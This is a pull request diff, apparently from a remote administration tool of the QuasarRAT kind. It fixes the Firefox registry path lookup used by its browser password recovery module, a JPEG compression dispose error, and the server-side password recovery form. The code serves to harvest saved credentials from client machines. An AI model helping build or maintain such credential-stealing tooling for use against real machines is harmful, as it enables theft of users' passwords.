### PR TITLE
Server fixes

### DIFF
--- a/Client/Core/Recovery/Browsers/Firefox.cs
+++ b/Client/Core/Recovery/Browsers/Firefox.cs
@@ -202,8 +202,11 @@ namespace xClient.Core.Recovery.Browsers
         private static DirectoryInfo GetFirefoxInstallPath()
         {
             // get firefox path from registry
-            using (RegistryKey key = RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.LocalMachine,
-                    @"SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox"))
+            using (RegistryKey key = PlatformHelper.Architecture == 64 ?
+                RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.LocalMachine,
+                    @"SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox") :
+                RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.LocalMachine,
+                    @"SOFTWARE\Mozilla\Mozilla Firefox"))
             {
                 if (key == null) return null;
 

--- a/Server/Core/Compression/JpgCompression.cs
+++ b/Server/Core/Compression/JpgCompression.cs
@@ -32,7 +32,11 @@ namespace xServer.Core.Compression
             {
                 if (_encoderParams != null)
                 {
-                    _encoderParams.Dispose();
+                    try
+                    {
+                        _encoderParams.Dispose();
+                    }
+                    catch { }
                 }
             }
         }

--- a/Server/Forms/FrmMain.cs
+++ b/Server/Forms/FrmMain.cs
@@ -591,8 +591,14 @@ namespace xServer.Forms
 
         private void ctxtPasswordRecovery_Click(object sender, EventArgs e)
         {
-            if (lstClients.SelectedItems.Count != 0)
+            foreach (Client c in GetSelectedClients())
             {
+                if (c.Value.FrmPass != null)
+                {
+                    c.Value.FrmPass.Focus();
+                    return;
+                }
+
                 FrmPasswordRecovery frmPass = new FrmPasswordRecovery(GetSelectedClients());
                 frmPass.Show();
             }


### PR DESCRIPTION
-Fixed obtaining Firefox path from registry. Firefox path will only be in Wow6432Node if OS is 64-bit.
-Fixed null reference exception disposing an object in `JpgCompression`
-Fixed multiple client form disposal on client disconnect for password recovery